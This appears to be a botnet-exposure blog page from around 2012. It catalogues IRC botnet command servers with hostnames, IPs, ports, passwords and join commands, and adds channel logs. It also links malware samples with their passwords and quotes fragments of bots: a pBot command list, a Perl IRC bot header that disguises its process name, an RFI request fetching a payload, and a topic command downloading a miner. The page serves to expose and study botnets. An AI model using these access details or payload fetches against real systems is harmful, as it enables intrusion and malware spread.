Another post from the same guy is here: http://www.exposedbotnets.com/2012/04/webethugsinsomnia-bot-hosted-in.html
Samples here: http://www.mediafire.com/?f25869md9bv3q9d (password: virus)
Control panel URL: http://anonproducts.info/xx/
Loader.exe is a .NET HTTP bot that connects to global-carding.ru/gate.php. It is used for DDoSing and loading malware (mainly RATs). Most files to be installed are loaded from webcamchat4free.in.
Packet captures of it in action: http://www.mediafire.com/?t8obhi8jttvh1l5
Credits to our
we.be.thu.gs(Insomnia bot hosted in Netherlands Amsterdam Ecatel Ltd)
A guy posted in this thread http://www.exposedbotnets.com/2012/04/insomnia-irc-bot-v113-manual.html about another Insomnia botnet server; you can read the comments for more.
Resolved : [we.be.thu.gs] To [80.82.79.21]
Bv1’s Insomnia bot server
Server: we.be.thu.gs
SSL is required to connect. Use XChat or install it on mIRC, and accept his invalid certificate.
Port: 443
Password: fuckyou
To connect, do this: /server we.be.thu.gs:+443
INSOMNIA IRC Bot v1.1.3 Manual
Insomnia is another IRC bot sold in hacking forums, coded in .NET. I'm posting the manual here so you can see what it does.
INSOMNIA v1.1.3
Table of Contents
1. Summary
2. Core Features
3. Malware Removal
4. SOCKS5
5. DDoS
6. Spreading Modules
7. Topic Generator Explained
8. Complete command list
Summary
Insomnia
noaccess.chaoswow.net(NZM bots hosted in Germany Nuremberg Hetzner Online Ag)
Resolved : [noaccess.chaoswow.net] To [176.9.195.60]
Remote Host Port Number
noaccess.chaoswow.net 18967
NICK USA|00|XP|SP2|1884237
USER fhfrlaam 0 0 :USA|00|XP|SP2|1884237
USERHOST USA|00|XP|SP2|1884237
MODE USA|00|XP|SP2|1884237 -x+i
JOIN ##&crackr0x#&## 1@$$smoqueed@@
NICK USA|00|XP|SP2|0441020
USER zfoxtlp 0 0 :USA|00|XP|SP2|0441020
USERHOST USA|00|XP|SP2|0441020
MODE USA|00|XP|SP2|0441020 -x+i
NICK USA|00|XP|SP2|5607084
USER ucxoiuauh 0 0 :USA|00|XP|SP2|5607084
USERHOST USA|00|XP|SP2|5607084
MODE USA|00|XP|SP2|5607084 -x+i
NICK USA|00|XP|SP2|5062754
USER oqqeofyr 0
fghfg.translate-google-cache.com(irc botnet hosted in Taiwan Taipei Taiwan Fixed Network Co. Ltd)
Remote Host Port Number
fghfg.translate-google-cache.com 5900
Other domains: tux.shannen.cc urcdw.zavoddebila.com
NICK [USA][XP-SP2]669217
USER VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY2742
JOIN ##Turb0-37##
NICK [USA][XP-SP2]062388
USER VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY7011
NICK {NOVA}[USA][XP-SP2]750366
USER VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY0938
Hosting info: http://whois.domaintools.com/61.31.99.67
Irc.javairc.org(Turkish noobs scanning for RFI)
I was looking for online users in my vBulletin site and I saw this:
/threads//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://95.154.24.14:32000//accounts/inc/admin/apache.jpg
I downloaded apache.jpg and I found that it is a lame pBot directing to irc.javairc.org.
Here http://95.154.24.14:32000//accounts/ I found the lamer behind all this: -=[ HackeD by PasteL ]=-
Here is the channel used for the RFI scan:
Now talking in
69.66.87.90(pBot hosted in United States Des Moines Des Moines Public Schools)
= COMMANDS ============================================================================
.user <password> //login to the bot
.logout //logout of the bot
.die //kill the bot
.restart //restart the bot
.mail <to> <from> <subject> <msg> //send an email
.dns <IP|HOST> //dns lookup
.download <URL> <filename> //download a file
.exec <cmd> // uses shell_exec() //execute a command
.cmd <cmd> // uses popen() //execute a
yaboyyoshi.info(ngrBot hosted in United Kingdom Redstation Limited)
Resolved : [yaboyyoshi.info] To [149.3.139.227]
Remote Host Port Number
yaboyyoshi.info 6969 PASS none
Update from our anonymous friend:
yaboyyoshi.info:5500 or 6969
pass: none
channel #aryan#
Now talking in #aryan#
Topic On: [ #aryan# ] [ @dload http://jessieandthetoyboys.com.br/cc_sminer_4-29.exe 1 ]
Topic By: [ Yoshi ]
Hosting info: http://whois.domaintools.com/149.3.139.227
irc.s4l1ty.info(Linux bots hosted in Indonesia Jakarta Primanet)
“Private Bot” lol
#!/usr/bin/perl
#
# Thanks To: irc.RoIrc.in
########## Configuration ############
my @ps = ("/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]");
my $processo = $ps[rand scalar @ps];
$servidor='irc.s4l1ty.info' unless $servidor;
my $porta='6667';
my @canais=("#X");
my @adms=("s4l1ty");
# Anti Flood ( 6/3 Recommended )
my $linas_max=10;
my $sleep=5;
my $nick = getnick();
my $ircname = getident2();
188.165.202.199(500 ngrBots hosted in France Paris Ovh Systems)
Server: 188.165.202.199:7000
JOIN #team hell
Local users: Current Local Users: 479 Max: 573
Global users: Current Global Users: 479 Max: 573
#team {DE|W7-64a}mkliatk!x@EFF4177A.A0F8E1F4.CC6C8B5.IP ~ZRt!Expl3it@IDFADM @Rejuven!Shlomi@IDFADM ~DAKiNE!Anonymous@IDFADM ~wGi!Nikka@IDFADM
End of /NAMES list.
:wGi!Nikka@IDFADM PRIVMSG #team :.usb on
It is funny how IRC bots can steal passwords from Chrome.
Session Start: Mon Apr 02 21:13:59 2012
Session Ident: #team